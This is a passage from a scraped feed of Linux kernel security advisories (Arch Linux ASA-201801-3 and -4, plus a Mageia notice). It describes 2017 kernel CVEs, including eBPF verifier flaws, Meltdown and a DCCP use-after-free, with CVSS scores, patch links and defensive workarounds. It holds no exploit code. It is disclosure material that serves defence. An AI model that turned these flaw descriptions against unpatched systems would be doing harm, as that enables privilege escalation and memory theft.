CVE-2017-17806 (denial of service)\n\nThe HMAC implementation (crypto/hmac.c) in the Linux kernel before\n4.14.8, 4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not validate\nthat the underlying cryptographic hash algorithm is unkeyed, allowing a\nlocal attacker able to use the AF_ALG-based hash interface\n(CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm\n(CONFIG_CRYPTO_SHA3) to cause a kernel stack buffer overflow by\nexecuting a crafted sequence of system calls that encounter a missing\nSHA-3 initialization.\n\n- CVE-2017-17852 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nmishandling of 32-bit ALU ops.\n\n- CVE-2017-17853 (denial of service)\n\nIt has been discovered kernel/bpf/verifier.c in the Linux kernel before\n4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nincorrect BPF_RSH signed bounds calculations.\n\n- CVE-2017-17854 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (integer\noverflow and memory corruption) or possibly have unspecified other\nimpact by leveraging unrestricted integer values for pointer\narithmetic.\n\n- CVE-2017-17855 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nimproper use of pointers in place of scalars.\n\n- CVE-2017-17856 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging the\nlack of stack-pointer alignment enforcement.\n\n- CVE-2017-17857 (denial of service)\n\nThe check_stack_boundary function in kernel/bpf/verifier.c in the Linux\nkernel before 4.14.9 allows local users to cause a denial of service\n(memory corruption) or possibly have unspecified other impact by\nleveraging mishandling of invalid variable stack read operations.\n\n- CVE-2017-17862 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 ignore unreachable code, even though it would\nstill be processed by JIT compilers. This behavior, also considered an\nimproper branch-pruning logic issue, could possibly be used by local\nusers for denial of service.\n\n- CVE-2017-17863 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 does not check the relationship between\npointer values and the BPF stack, which allows local users to cause a\ndenial of service (integer overflow or invalid memory access) or\npossibly have unspecified other impact.\n\n- CVE-2017-17864 (information disclosure)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.73 mishandles states_equal comparisons between\nthe pointer data type and the UNKNOWN_VALUE data type, which allows\nlocal users to obtain potentially sensitive address information, aka a\n\"pointer leak.\"\n\n- CVE-2017-5754 (access restriction bypass)\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a\ncommonly used performance optimization).\nThis variant (\"Rogue Data Load\") relies on the fact that, on impacted\nmicroprocessors, during speculative execution of instruction permission\nfaults, exception generation triggered by a faulting access is\nsuppressed until the retirement of the whole instruction block. In a\ncombination with the fact that memory accesses may populate the cache\neven when the block is being dropped and never committed (executed), an\nunprivileged local attacker could use this flaw to read memory from\narbitrary addresses, including privileged (kernel space) and all other\nprocesses running on the system by conducting targeted cache side-\nchannel attacks.\n\n- CVE-2017-8824 (privilege escalation)\n\nA use-after-free vulnerability was found in DCCP socket code affecting\nthe Linux kernel since 2.6.16. The dccp_disconnect function in\nnet/dccp/proto.c allows local users to gain privileges or cause a\ndenial of service via an AF_UNSPEC connect system call during the\nDCCP_LISTEN state.\n\nImpact\n======\n\nA local unprivileged attacker is able to escalate privileges, crash the\nsystem, read memory from arbitrary addresses including from the kernel\nand all other processes running on the system or obtain sensitive\ninformation by sniffing an nlmon interface for all Netlink activity on\nthe system.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56832\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454\nhttp://www.openwall.com/lists/oss-security/2017/12/21/2\nhttps://git.kernel.org/linus/95a762e2c8c942780948091f8f2a4f32fce1ac6f\nhttps://git.kernel.org/linus/0c17d1d2c61936401f4702e1846e2c19b200f958\nhttps://git.kernel.org/linus/93c647643b48f0131f02e45da3bd367d80443291\nhttps://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md\nhttps://git.kernel.org/linus/48a4ff1c7bb5a32d2e396b03132d20d552c0eca7\nhttp://openwall.com/lists/oss-security/2017/12/12/7\nhttps://git.kernel.org/linus/8f659a03a0ba9289b9aeb9b4470e6fb263d6f483\nhttps://git.kernel.org/linus/ecaaab5649781c5a0effdaf298a925063020500e\nhttps://git.kernel.org/linus/af3ff8045bbf3e32f1a448542e73abb4c8ceb6f1\nhttps://git.kernel.org/linus/468f6eafa6c44cb2c5d8aad35e12f06c240a812a\nhttps://git.kernel.org/linus/4374f256ce8182019353c0c639bb8d0695b4c941\nhttps://git.kernel.org/linus/bb7f0f989ca7de1153bd128a40a71709e339fa03\nhttps://git.kernel.org/linus/179d1c5602997fef5a940c6ddcf31212cbfebd14\nhttps://git.kernel.org/linus/a5ec6ae161d72f01411169a938fa5f8baea16e8f\nhttps://git.kernel.org/linus/ea25f914dc164c8d56b36147ecc86bc65f83c469\nhttps://git.kernel.org/linus/c131187db2d3fa2f8bf32fdf4e9a4ef805168467\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=d75d3ee237cee9068022117e059b64bbab617f3d\nhttps://git.kernel.org/linus/de31796c052e47c99b1bb342bc70aa826733e862\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=37435f7e80ef9adc32a69013c18f135e3f434244\nhttps://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html\nhttps://meltdownattack.com\nhttps://xenbits.xen.org/xsa/advisory-254.html\nhttp://blog.cyberus-technology.de/posts/2018-01-03-meltdown.html\nhttps://git.kernel.org/linus/5aa90a84589282b87666f92b6c3c917c8080a9bf\nhttps://git.kernel.org/linus/00a5ae218d57741088068799b810416ac249a9ce\nhttps://git.kernel.org/linus/69c64866ce072dea1d1e59a0d61e0f66c0dffb76\nhttps://security.archlinux.org/CVE-2017-16995\nhttps://security.archlinux.org/CVE-2017-16996\nhttps://security.archlinux.org/CVE-2017-17449\nhttps://security.archlinux.org/CVE-2017-17558\nhttps://security.archlinux.org/CVE-2017-17712\nhttps://security.archlinux.org/CVE-2017-17805\nhttps://security.archlinux.org/CVE-2017-17806\nhttps://security.archlinux.org/CVE-2017-17852\nhttps://security.archlinux.org/CVE-2017-17853\nhttps://security.archlinux.org/CVE-2017-17854\nhttps://security.archlinux.org/CVE-2017-17855\nhttps://security.archlinux.org/CVE-2017-17856\nhttps://security.archlinux.org/CVE-2017-17857\nhttps://security.archlinux.org/CVE-2017-17862\nhttps://security.archlinux.org/CVE-2017-17863\nhttps://security.archlinux.org/CVE-2017-17864\nhttps://security.archlinux.org/CVE-2017-5754\nhttps://security.archlinux.org/CVE-2017-8824", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-05T00:00:00", "type": "archlinux", "title": "[ASA-201801-3] linux-zen: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17449", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17805", "CVE-2017-17806", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-5754", "CVE-2017-8824"], "modified": "2018-01-05T00:00:00", "id": "ASA-201801-3", "href": "https://security.archlinux.org/ASA-201801-3", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:34:05", "description": "Arch Linux Security Advisory ASA-201801-4\n=========================================\n\nSeverity: High\nDate : 2018-01-05\nCVE-ID : CVE-2017-16995 CVE-2017-16996 CVE-2017-17448 CVE-2017-17449\nCVE-2017-17450 CVE-2017-17558 CVE-2017-17712 CVE-2017-17741\nCVE-2017-17805 CVE-2017-17806 CVE-2017-17852 CVE-2017-17853\nCVE-2017-17854 CVE-2017-17855 CVE-2017-17856 CVE-2017-17857\nCVE-2017-17862 CVE-2017-17863 CVE-2017-17864 CVE-2017-5754\nCVE-2017-8824\nPackage : linux-hardened\nType : multiple issues\nRemote : No\nLink : https://security.archlinux.org/AVG-574\n\nSummary\n=======\n\nThe package linux-hardened before version 4.14.11.a-1 is vulnerable to\nmultiple issues including access restriction bypass, denial of service,\nprivilege escalation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 4.14.11.a-1.\n\n# pacman -Syu \"linux-hardened>=4.14.11.a-1\"\n\nThe problems have been fixed upstream in version 4.14.11.a.\n\nWorkaround\n==========\n\nBPF related issues can be circumvented by disabling unprivileged BPF:\n\n sysctl -w kernel.unprivileged_bpf_disabled=1\n\nOn systems that do not already have the dccp module loaded,\nCVE-2017-8824 can be mitigated by disabling it:\n\n echo >> /etc/modprobe.d/disable-dccp.conf install dccp false\n\nDescription\n===========\n\n- CVE-2017-16995 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9, 4.9.72 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-16996 (privilege escalation)\n\nAn arbitrary memory r/w access issue was found in the Linux kernel\nbefore 4.14.9 compiled with the eBPF bpf(2) system call\n(CONFIG_BPF_SYSCALL) support. The issue could occur due to calculation\nerrors in the eBPF verifier module, triggered by user supplied\nmalicious BPF program. An unprivileged user could use this flaw to\nescalate their privileges on a system. Setting parameter\n\"kernel.unprivileged_bpf_disabled=1\" prevents such privilege escalation\nby restricting access to bpf(2) call.\n\n- CVE-2017-17448 (access restriction bypass)\n\nIt has been discovered that net/netfilter/nfnetlink_cthelper.c in the\nLinux kernel through 4.14.4 does not require the CAP_NET_ADMIN\ncapability for new, get, and del operations, which allows local users\nto bypass intended access restrictions because the nfnl_cthelper_list\ndata structure is shared across all net namespaces.\n\n- CVE-2017-17449 (information disclosure)\n\nThe __netlink_deliver_tap_skb function in net/netlink/af_netlink.c in\nthe Linux kernel before 4.14.11, 4.9.74, 4.4.109, 3.18.91 and 3.16.52\nwhen CONFIG_NLMON is enabled, does not restrict observations of Netlink\nmessages to a single net namespace, which allows local users to obtain\nsensitive information by leveraging the CAP_NET_ADMIN capability to\nsniff an nlmon interface for all Netlink activity on the system.\n\n- CVE-2017-17450 (access restriction bypass)\n\nIt has been discovered that net/netfilter/xt_osf.c in the Linux kernel\nthrough 4.14.4 does not require the CAP_NET_ADMIN capability for\nadd_callback and remove_callback operations, which allows local users\nto bypass intended access restrictions because the xt_osf_fingers data\nstructure is shared across all net namespaces.\n\n- CVE-2017-17558 (denial of service)\n\nThe usb_destroy_configuration function in drivers/usb/core/config.c in\nthe USB core subsystem in the Linux kernel before 4.14.8, 4.9.71,\n4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not consider the maximum\nnumber of configurations and interfaces before attempting to release\nresources, which allows local users to cause a denial of service (out-\nof-bounds write access) or possibly have unspecified other impact via a\ncrafted USB device.\n\n- CVE-2017-17712 (privilege escalation)\n\nA flaw was found in the Linux kernel's implementation of raw_sendmsg\nbefore 4.14.11, 4.4.109 and 4.9.74 allowing a local attacker to panic\nthe kernel or possibly leak kernel addresses. A local attacker, with\nthe privilege of creating raw sockets, can abuse a possible race\ncondition when setting the socket option to allow the kernel to\nautomatically create ip header values and thus potentially escalate\ntheir privileges.\n\n- CVE-2017-17741 (information disclosure)\n\nThe KVM implementation in the Linux kernel through 4.14.7 allows\nattackers to obtain potentially sensitive information from kernel\nmemory, aka a write_mmio stack-based out-of-bounds read, related to\narch/x86/kvm/x86.c and include/trace/events/kvm.h.\n\n- CVE-2017-17805 (denial of service)\n\nThe Salsa20 encryption algorithm in the Linux kernel before 4.14.8,\n4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not correctly handle\nzero-length inputs, allowing a local attacker able to use the AF_ALG-\nbased skcipher interface (CONFIG_CRYPTO_USER_API_SKCIPHER) to cause a\ndenial of service (uninitialized-memory free and kernel crash) or have\nunspecified other impact by executing a crafted sequence of system\ncalls that use the blkcipher_walk API. Both the generic implementation\n(crypto/salsa20_generic.c) and x86 implementation\n(arch/x86/crypto/salsa20_glue.c) of Salsa20 were vulnerable.\n\n- CVE-2017-17806 (denial of service)\n\nThe HMAC implementation (crypto/hmac.c) in the Linux kernel before\n4.14.8, 4.9.71, 4.4.107, 3.18.89, 3.16.52 and 3.2.97 does not validate\nthat the underlying cryptographic hash algorithm is unkeyed, allowing a\nlocal attacker able to use the AF_ALG-based hash interface\n(CONFIG_CRYPTO_USER_API_HASH) and the SHA-3 hash algorithm\n(CONFIG_CRYPTO_SHA3) to cause a kernel stack buffer overflow by\nexecuting a crafted sequence of system calls that encounter a missing\nSHA-3 initialization.\n\n- CVE-2017-17852 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nmishandling of 32-bit ALU ops.\n\n- CVE-2017-17853 (denial of service)\n\nIt has been discovered kernel/bpf/verifier.c in the Linux kernel before\n4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nincorrect BPF_RSH signed bounds calculations.\n\n- CVE-2017-17854 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (integer\noverflow and memory corruption) or possibly have unspecified other\nimpact by leveraging unrestricted integer values for pointer\narithmetic.\n\n- CVE-2017-17855 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging\nimproper use of pointers in place of scalars.\n\n- CVE-2017-17856 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 allows local users to cause a denial of service (memory\ncorruption) or possibly have unspecified other impact by leveraging the\nlack of stack-pointer alignment enforcement.\n\n- CVE-2017-17857 (denial of service)\n\nThe check_stack_boundary function in kernel/bpf/verifier.c in the Linux\nkernel before 4.14.9 allows local users to cause a denial of service\n(memory corruption) or possibly have unspecified other impact by\nleveraging mishandling of invalid variable stack read operations.\n\n- CVE-2017-17862 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 ignore unreachable code, even though it would\nstill be processed by JIT compilers. This behavior, also considered an\nimproper branch-pruning logic issue, could possibly be used by local\nusers for denial of service.\n\n- CVE-2017-17863 (denial of service)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.72 does not check the relationship between\npointer values and the BPF stack, which allows local users to cause a\ndenial of service (integer overflow or invalid memory access) or\npossibly have unspecified other impact.\n\n- CVE-2017-17864 (information disclosure)\n\nIt has been discovered that kernel/bpf/verifier.c in the Linux kernel\nbefore 4.14.9 and 4.9.73 mishandles states_equal comparisons between\nthe pointer data type and the UNKNOWN_VALUE data type, which allows\nlocal users to obtain potentially sensitive address information, aka a\n\"pointer leak.\"\n\n- CVE-2017-5754 (access restriction bypass)\n\nAn industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of instructions (a\ncommonly used performance optimization).\nThis variant (\"Rogue Data Load\") relies on the fact that, on impacted\nmicroprocessors, during speculative execution of instruction permission\nfaults, exception generation triggered by a faulting access is\nsuppressed until the retirement of the whole instruction block. In a\ncombination with the fact that memory accesses may populate the cache\neven when the block is being dropped and never committed (executed), an\nunprivileged local attacker could use this flaw to read memory from\narbitrary addresses, including privileged (kernel space) and all other\nprocesses running on the system by conducting targeted cache side-\nchannel attacks.\n\n- CVE-2017-8824 (privilege escalation)\n\nA use-after-free vulnerability was found in DCCP socket code affecting\nthe Linux kernel since 2.6.16. The dccp_disconnect function in\nnet/dccp/proto.c allows local users to gain privileges or cause a\ndenial of service via an AF_UNSPEC connect system call during the\nDCCP_LISTEN state.\n\nImpact\n======\n\nA local unprivileged attacker is able to escalate privileges, crash the\nsystem, read memory from arbitrary addresses including from the kernel\nand all other processes running on the system or obtain sensitive\ninformation by sniffing an nlmon interface for all Netlink activity on\nthe system.\n\nReferences\n==========\n\nhttps://bugs.archlinux.org/task/56832\nhttps://bugs.chromium.org/p/project-zero/issues/detail?id=1454\nhttp://www.openwall.com/lists/oss-security/2017/12/21/2\nhttps://git.kernel.org/linus/95a762e2c8c942780948091f8f2a4f32fce1ac6f\nhttps://git.kernel.org/linus/0c17d1d2c61936401f4702e1846e2c19b200f958\nhttps://git.kernel.org/linus/4b380c42f7d00a395feede754f0bc2292eebe6e5\nhttps://git.kernel.org/linus/93c647643b48f0131f02e45da3bd367d80443291\nhttps://git.kernel.org/linus/916a27901de01446bcf57ecca4783f6cff493309\nhttps://github.com/google/syzkaller/blob/master/docs/linux/found_bugs_usb.md\nhttps://git.kernel.org/linus/48a4ff1c7bb5a32d2e396b03132d20d552c0eca7\nhttp://openwall.com/lists/oss-security/2017/12/12/7\nhttps://git.kernel.org/linus/8f659a03a0ba9289b9aeb9b4470e6fb263d6f483\nhttps://git.kernel.org/linus/e39d200fa5bf5b94a0948db0dae44c1b73b84a56\nhttps://git.kernel.org/linus/ecaaab5649781c5a0effdaf298a925063020500e\nhttps://git.kernel.org/linus/af3ff8045bbf3e32f1a448542e73abb4c8ceb6f1\nhttps://git.kernel.org/linus/468f6eafa6c44cb2c5d8aad35e12f06c240a812a\nhttps://git.kernel.org/linus/4374f256ce8182019353c0c639bb8d0695b4c941\nhttps://git.kernel.org/linus/bb7f0f989ca7de1153bd128a40a71709e339fa03\nhttps://git.kernel.org/linus/179d1c5602997fef5a940c6ddcf31212cbfebd14\nhttps://git.kernel.org/linus/a5ec6ae161d72f01411169a938fa5f8baea16e8f\nhttps://git.kernel.org/linus/ea25f914dc164c8d56b36147ecc86bc65f83c469\nhttps://git.kernel.org/linus/c131187db2d3fa2f8bf32fdf4e9a4ef805168467\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=d75d3ee237cee9068022117e059b64bbab617f3d\nhttps://git.kernel.org/linus/de31796c052e47c99b1bb342bc70aa826733e862\nhttps://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=37435f7e80ef9adc32a69013c18f135e3f434244\nhttps://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html\nhttps://meltdownattack.com\nhttps://xenbits.xen.org/xsa/advisory-254.html\nhttp://blog.cyberus-technology.de/posts/2018-01-03-meltdown.html\nhttps://git.kernel.org/linus/5aa90a84589282b87666f92b6c3c917c8080a9bf\nhttps://git.kernel.org/linus/00a5ae218d57741088068799b810416ac249a9ce\nhttps://git.kernel.org/linus/69c64866ce072dea1d1e59a0d61e0f66c0dffb76\nhttps://security.archlinux.org/CVE-2017-16995\nhttps://security.archlinux.org/CVE-2017-16996\nhttps://security.archlinux.org/CVE-2017-17448\nhttps://security.archlinux.org/CVE-2017-17449\nhttps://security.archlinux.org/CVE-2017-17450\nhttps://security.archlinux.org/CVE-2017-17558\nhttps://security.archlinux.org/CVE-2017-17712\nhttps://security.archlinux.org/CVE-2017-17741\nhttps://security.archlinux.org/CVE-2017-17805\nhttps://security.archlinux.org/CVE-2017-17806\nhttps://security.archlinux.org/CVE-2017-17852\nhttps://security.archlinux.org/CVE-2017-17853\nhttps://security.archlinux.org/CVE-2017-17854\nhttps://security.archlinux.org/CVE-2017-17855\nhttps://security.archlinux.org/CVE-2017-17856\nhttps://security.archlinux.org/CVE-2017-17857\nhttps://security.archlinux.org/CVE-2017-17862\nhttps://security.archlinux.org/CVE-2017-17863\nhttps://security.archlinux.org/CVE-2017-17864\nhttps://security.archlinux.org/CVE-2017-5754\nhttps://security.archlinux.org/CVE-2017-8824", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-05T00:00:00", "type": "archlinux", "title": "[ASA-201801-4] linux-hardened: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16995", "CVE-2017-16996", "CVE-2017-17448", "CVE-2017-17449", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-17712", "CVE-2017-17741", "CVE-2017-17805", "CVE-2017-17806", "CVE-2017-17852", "CVE-2017-17853", "CVE-2017-17854", "CVE-2017-17855", "CVE-2017-17856", "CVE-2017-17857", "CVE-2017-17862", "CVE-2017-17863", "CVE-2017-17864", "CVE-2017-5754", "CVE-2017-8824"], "modified": "2018-01-05T00:00:00", "id": "ASA-201801-4", "href": "https://security.archlinux.org/ASA-201801-4", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "This kernel-linus update provides an upgrade to the 4.14 longterm branch, currently based on 4.14.10. It also fixes at least the following security issues: An elevation of privilege vulnerability in the Broadcom wi-fi driver (CVE-2017-0786). Use-after-free vulnerability in the snd_pcm_info function in the ALSA subsystem in the Linux kernel allows attackers to gain privileges via unspecified vectors (CVE-2017-0861). Linux kernel built with the Kernel-based Virtual Machine(CONFIG_KVM) support is vulnerable to an incorrect debug exception(#DB) error. It could occur while emulating a syscall instruction. A user/process inside guest could use this flaw to potentially escalate their privileges inside guest. Linux guests are not affected.(CVE-2017-7518). arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an \"MMU potential stack buffer overrun\" (CVE-2017-12188). The bio_map_user_iov and bio_unmap_user functions in block/bio.c in the Linux kernel before 4.13.8 do unbalanced refcounting when a SCSI I/O vector has small consecutive buffers belonging to the same page. The bio_add_pc_page function merges them into one, but the page reference is never dropped. This causes a memory leak and possible system lockup (exploitable against the host OS by a guest OS user, if a SCSI disk is passed through to a virtual machine) due to an out-of-memory condition (CVE-2017-12190). The assoc_array_insert_into_terminal_node function in lib/assoc_array.c in the Linux kernel before 4.13.11 mishandles node splitting, which allows local users to cause a denial of service (NULL pointer dereference and panic) via a crafted application, as demonstrated by the keyring key type, and key addition and link creation operations (CVE-2017-12193). Wi-Fi Protected Access (WPA and WPA2) allows reinstallation of the Group Temporal Key (GTK) during the group key handshake, allowing an attacker within radio range to replay frames from access points to clients (CVE-2017-13080). The sctp_do_peeloff function in net/sctp/socket.c in the Linux kernel before 4.14 does not check whether the intended netns is used in a peel-off action, which allows local users to cause a denial of service (use-after-free and system crash) or possibly have unspecified other impact via crafted system calls (CVE-2017-15115). Race condition in the ALSA subsystem in the Linux kernel before 4.13.8 allows local users to cause a denial of service (use-after-free) or possibly have unspecified other impact via crafted /dev/snd/seq ioctl calls, related to sound/core/seq/seq_clientmgr.c and sound/core/seq/seq_ports.c (CVE-2017-15265) The KEYS subsystem in the Linux kernel through 4.13.7 mishandles use of add_key for a key that already exists but is uninstantiated, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted system call (CVE-2017-15299). The XFRM dump policy implementation in net/xfrm/xfrm_user.c in the Linux kernel before 4.13.11 allows local users to gain privileges or cause a denial of service (use-after-free) via a crafted SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink messages (CVE-2017-16939). The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call (CVE-2017-16994). The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension (CVE-2017-16995). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling (CVE-2017-16996). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of 32-bit ALU ops (CVE-2017-17852). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations (CVE-2017-17853). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (integer overflow and memory corruption) or possibly have unspecified other impact by leveraging unrestricted integer values for pointer arithmetic (CVE-2017-17854). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars (CVE-2017-17855). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement (CVE-2017-17856). The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations (CVE-2017-17857). kernel/bpf/verifier.c in the Linux kernel through 4.14.8 ignores unreachable code, even though it would still be processed by JIT compilers. This behavior, also considered an improper branch-pruning logic issue, could possibly be used by local users for denial of service (CVE-2017-17862). kernel/bpf/verifier.c in the Linux kernel 4.9.x through 4.9.71 does not check the relationship between pointer values and the BPF stack, which allows local users to cause a denial of service (integer overflow or invalid memory access) or possibly have unspecified other impact (CVE-2017-17863). kernel/bpf/verifier.c in the Linux kernel before 4.14 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a \"pointer leak\" (CVE-2017-17864). The timer_create syscall implementation in kernel/time/posix-timers.c in the Linux kernel before 4.14.8 doesn't properly validate the sigevent->sigev_notify field, which leads to out-of-bounds access in the show_timer function (called when /proc/$PID/timers is read). This allows userspace applications to read arbitrary kernel memory (on a kernel built with CONFIG_POSIX_TIMERS and CONFIG_CHECKPOINT_RESTORE)(CVE-2017-18344). The Linux Kernel 2.6.32 and later are affected by a denial of service, by flooding the diagnostic port 0x80 an exception can be triggered leading to a kernel panic (CVE-2017-1000407). For other changes in this update, read the referenced changelogs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-06T00:53:31", "type": "mageia", "title": "kernel-linus update provides 4.14 series and fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 